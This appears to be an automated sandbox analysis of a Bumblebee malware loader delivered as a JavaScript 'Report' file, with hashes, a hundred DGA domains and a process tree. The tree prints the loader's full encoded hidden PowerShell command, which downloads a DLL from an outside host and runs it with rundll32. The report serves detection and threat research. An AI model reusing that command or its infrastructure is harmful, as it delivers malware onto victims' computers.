Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
submitted
22-10-2024 21:04
Static task
static1
Behavioral task
behavioral1
Sample
Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
Resource
win7-20240708-en
General
-
Target
Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
-
Size
42KB
-
MD5
c77a5b4849df9ec7bdcdf970504c6bf5
-
SHA1
cea1a6eff08bf3c54eb889af265b0f62f6897cf9
-
SHA256
3df813c5990e6bf7a841b1ecac9e224903e37a3f8e32d63b9816c3507aab5637
-
SHA512
a24a3ca285cd942f1170f75ceb23a97c441cf7694b53af8e5c1c880e5ff6bbddde50f78e28a97785276998b5c7646ffccb34d5e2d0f13fe8a85acaa80f8bf98e
-
SSDEEP
768:2/OWgWxiLG0nMLTYFFd4SCEA4iuxbSHsH0G4SCS64TN+n6AmiY7BTER/Xzb1ql83:zBgR/Xzb1qblhoooLCk+TBUVDiwQ+pa2
Malware Config
Extracted
https://mycocojamboo.com/bgfhfg/lGmEQCgpfT.dll
Extracted
bumblebee
lnk001
-
dga
tvx1ovdepj8.life
acgr6r8zdot.life
ilofx941igp.life
8x2apo5m7ri.life
x9yrzer0ndt.life
93j4v4jopzd.life
ameagxzo2f7.life
nyy41uibsv5.life
ru4jvijdytq.life
l9t6r0y6cvi.life
f4vb9n3tdvh.life
9do3mcejztt.life
pxu1ajsdhqr.life
7exy2b231n2.life
vu5b47m18jn.life
6mnudp7zj73.life
p5047yjrb8q.life
d0xtxp89bb9.life
ygo9u1fkwux.life
fig3gj0v6qe.life
38f5wvwwn7o.life
txgogs9p8a1.life
uyn0icgx1kv.life
2z1ls31az7s.life
0cc2z8zrnhf.life
fsr2hskx44p.life
du19ek78tjw.life
234ct3lkozp.life
he8fq4k8d3w.life
7ewh8ltr7il.life
dw34kmgfl7t.life
f2j20ayqh8y.life
331k2rdkmmb.life
37z6li6l9y2.life
dpgs2lt1sbz.life
plll0xq4y82.life
bzc9sq2pz53.life
7r8ln1wswth.life
y9neib92f2m.life
m5iukps17y7.life
xo8be64ejh2.life
widn8soih8u.life
08mkuqnx6gv.life
lzeqr3apopn.life
o4m5a5no7e8.life
2u8znzsbrto.life
dxyob8x456a.life
lrugnff8fkc.life
38i6lh0rpze.life
mjb3r6mcs1f.life
vl41cymzzfq.life
qc4mwjiop45.life
z3z4fq0420z.life
0tab35o0swu.life
4izk0gc9is6.life
6brdh3p893b.life
736d0mvetjw.life
drmk5rdefb5.life
1v0xhie4os8.life
khxcp22s3dz.life
8z9m8hndrhp.life
xeoz1f1vjs0.life
lobavyclh8e.life
in4pzu7t2pv.life
j280b59doxz.life
6q894zusd4k.life
y7pzxau0717.life
bev8ymaajb7.life
glux8x5b8d6.life
yan95akxgqt.life
9qiliikd3sp.life
ge0lpqif3ar.life
ar7xakeve0o.life
eb4l6wisq9z.life
1grovn87c8s.life
wdga570b8pz.life
nzs8vi9w5o8.life
q7dfpyyhe08.life
exueqqmz3ia.life
65r8nx12fqr.life
vauy5ah65sx.life
8hjv8mbhrlj.life
eeqwg3mzq07.life
b1h0uaabzyz.life
8qvt5iabz5n.life
8ru044xed25.life
w8ligr695sd.life
3e6rrifr5fn.life
9f6p9g7x13s.life
ibcm5at6qrz.life
spd22scperm.life
4k59ij2ujeu.life
07zxfo0kere.life
nhdeapyfg7e.life
y0zvqpi42no.life
zdf5ki8x9r0.life
8mgj12azbyd.life
l6syolvczan.life
mk7plk9c6i2.life
hudrx8fn980.life
-
dga_seed
1016365528594956469
-
domain_length
11
-
num_dga_domains
100
-
port
443
Signatures
-
Bumblebee family
-
Blocklisted process makes network request 19 IoCs
flow pid Process 31 1556 rundll32.exe 110 1556 rundll32.exe 141 1556 rundll32.exe 156 1556 rundll32.exe 158 1556 rundll32.exe 160 1556 rundll32.exe 162 1556 rundll32.exe 166 1556 rundll32.exe 173 1556 rundll32.exe 175 1556 rundll32.exe 177 1556 rundll32.exe 182 1556 rundll32.exe 188 1556 rundll32.exe 198 1556 rundll32.exe 200 1556 rundll32.exe 202 1556 rundll32.exe 204 1556 rundll32.exe 207 1556 rundll32.exe 211 1556 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3260 powershell.exe 2428 powershell.exe 3168 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 3260 powershell.exe 3260 powershell.exe 2428 powershell.exe 2428 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 2784 msedge.exe 2784 msedge.exe 1968 msedge.exe 1968 msedge.exe 3432 identity_helper.exe 3432 identity_helper.exe 5856 msedge.exe 5856 msedge.exe 5856 msedge.exe 5856 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 3168 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe 1968 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3544 wrote to memory of 3260 3544 wscript.exe 84 PID 3544 wrote to memory of 3260 3544 wscript.exe 84 PID 3260 wrote to memory of 2428 3260 powershell.exe 86 PID 3260 wrote to memory of 2428 3260 powershell.exe 86 PID 2428 wrote to memory of 1556 2428 powershell.exe 99 PID 2428 wrote to memory of 1556 2428 powershell.exe 99 PID 3544 wrote to memory of 3168 3544 wscript.exe 107 PID 3544 wrote to memory of 3168 3544 wscript.exe 107 PID 3168 wrote to memory of 1968 3168 powershell.exe 109 PID 3168 wrote to memory of 1968 3168 powershell.exe 109 PID 1968 wrote to memory of 1668 1968 msedge.exe 110 PID 1968 wrote to memory of 1668 1968 msedge.exe 110 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 1264 1968 msedge.exe 111 PID 1968 wrote to memory of 2784 1968 msedge.exe 112 PID 1968 wrote to memory of 2784 1968 msedge.exe 112 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113 PID 1968 wrote to memory of 1160 1968 msedge.exe 113
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAHkAYwBvAGMAbwBqAGEAbQBiAG8AbwAuAGMAbwBtAC8AYgBnAGYAaABmAGcALwBsAEcAbQBFAFEAQwBnAHAAZgBUAC4AZABsAGwAJwA7ACAAJAB0AEQATgBkAEkAVAA4AG0APQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABzAEQAawBwAEQAMwBJADgAJwA7ACAAJABxAFoAWABkAGEASQBwADIAPQAkAHQARABOAGQASQBUADgAbQArACcAXABkAGwAbABmAGkAbABlAC4AZABsAGwAJwA7ACAAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABEAE4AZABJAFQAOABtACkAKQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQARABOAGQASQBUADgAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAB9ADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAHcAQQAzAEsAMABqAHUASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABxAFoAWABkAGEASQBwADIAOwAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAJABxAFoAWABkAGEASQBwADIALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAHkAYwBvAGMAbwBqAGEAbQBiAG8AbwAuAGMAbwBtAC8AYgBnAGYAaABmAGcALwBsAEcAbQBFAFEAQwBnAHAAZgBUAC4AZABsAGwAJwA7ACAAJAB0AEQATgBkAEkAVAA4AG0APQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABzAEQAawBwAEQAMwBJADgAJwA7ACAAJABxAFoAWABkAGEASQBwADIAPQAkAHQARABOAGQASQBUADgAbQArACcAXABkAGwAbABmAGkAbABlAC4AZABsAGwAJwA7ACAAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABEAE4AZABJAFQAOABtACkAKQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQARABOAGQASQBUADgAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAB9ADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAHcAQQAzAEsAMABqAHUASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABxAFoAWABkAGEASQBwADIAOwAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAJABxAFoAWABkAGEASQBwADIALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIA3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\sDkpD3I8\dllfile.dll,DllRegisterServer4⤵
- Blocklisted process makes network request
PID:1556
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -C "start https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd630d46f8,0x7ffd630d4708,0x7ffd630d47184⤵PID:1668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:24⤵PID:1264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:84⤵PID:1160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:14⤵PID:1888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:14⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:84⤵PID:4716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:14⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:14⤵PID:380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:14⤵PID:4136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:14⤵PID:1888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1296 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:5856
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1568
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2016
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD561e2e57471d559f5f6813c0a7995c075
SHA133c621541bc0892ddab1b65345a348c14af566e5
SHA256c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d
SHA5129fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c
-
Filesize
152B
MD5443a627d539ca4eab732bad0cbe7332b
SHA186b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA2561e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d
-
Filesize
152B
MD599afa4934d1e3c56bbce114b356e8a99
SHA13f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA25608e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA51276686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize816B
MD5575cfcde7332b11b500f391131e6291f
SHA14bb949b996fa76f829c23b4114c65c324102fcf6
SHA256b30076e49c143f95700e9da694ea40c102df21fa393e127fb836d4320517bdfb
SHA512d699339cdef3e82a80db847af71310c3fa92ed1a11b5ef9aa933ce90f9afbbedd39bc38c005b746fe2b8d4a4749852a7703e7c0bc90a513040299429805a87fd
-
Filesize
1KB
MD5550891bb3b717c0748b16cefdc3421fe
SHA10272e629a990d8d0343f39f3f265c07ea242470b
SHA256c4b2c630fc4fc8b2e3f0e1142e060d63a4e32d419491be3cb078ee37499792f6
SHA5123f6c6a9695ec9e3f0159d974b6f60eb5f03a380cca297c7c82996652876c8b47b75504b4103f06cae1d2e354648b86128d7767122196f4e399a2c05981df4305
-
Filesize
5KB
MD5e4739b2bbbade2508a6d1d6235776bb2
SHA108da2d7cc4ab2163928bc31569eab10c9d1fbd23
SHA256ef9f813c03f8a1c6b085c98230af1fd5d65866e4c87b936600f99e82859dbd20
SHA512376881b542196fd0d16d3c5672bbb96cd302215010e3a67ec5c0057fb0d30654f6d804672efdd52c3933549225328a2d68428912547100fe4d1451234589e80f
-
Filesize
6KB
MD5fb3394b1af2dce5e03e8175286b95a64
SHA1d56918d16d33edd1a273ccad48b4239ff2cc0400
SHA256c892f2136114ee571094f06e9d960faafd6a1b880087196898ad662f98658201
SHA512c6213b152e130e58003b4b341a18c41d42b52df13946aa2ce5ff5131237d8d7a8e0d08a36b3b83d2a1cfc44f5435e142eb3394033b21ef8296469bcf840c7b1f
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
11KB
MD5682fea592a0fafacc67b6fd2b4a2f17e
SHA1eeb7ac914c991b3cbc59625577c62cf98f22ff6e
SHA256f00c1ee32fd4add83b6ef036eb2af0014fd817d64e26f3528452abf790c28ef9
SHA512f07bac059e5efa11a780101d32b19d46989bdcfc29ae0ebcaf70d6eefc9cafa60fc73e7779858c30d9050bbdf6784e1d9eecf357951a3e783b76d2db9e334d6c
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82